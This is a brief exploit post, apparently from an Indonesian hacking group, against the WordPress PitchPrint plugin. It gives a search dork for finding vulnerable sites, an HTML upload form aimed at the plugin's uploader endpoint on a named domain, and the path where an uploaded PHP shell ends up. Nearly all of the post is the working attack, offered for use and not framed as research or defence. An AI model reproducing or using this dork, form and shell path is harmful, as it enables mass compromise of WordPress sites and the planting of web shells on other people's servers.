Assalamuallaikum Wr.Wb
- #Author: People_hurt
- #Dork: inurl:"inurl:/wp-content/plugins/pitchprint/"
- #Vulnerability:/wp-content/plugins/pitchprint/uploader/
- #Type: CSRF & Xampp ,Uploadify
- #Tested:-
- #CMS:WordPress
- Indonesian Cyber Freedom
CSRF:
<form method="POST" action="http://IcalSadega.com/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Location :
/wp-content/plugins/pitchprint/uploader/files/Ical.php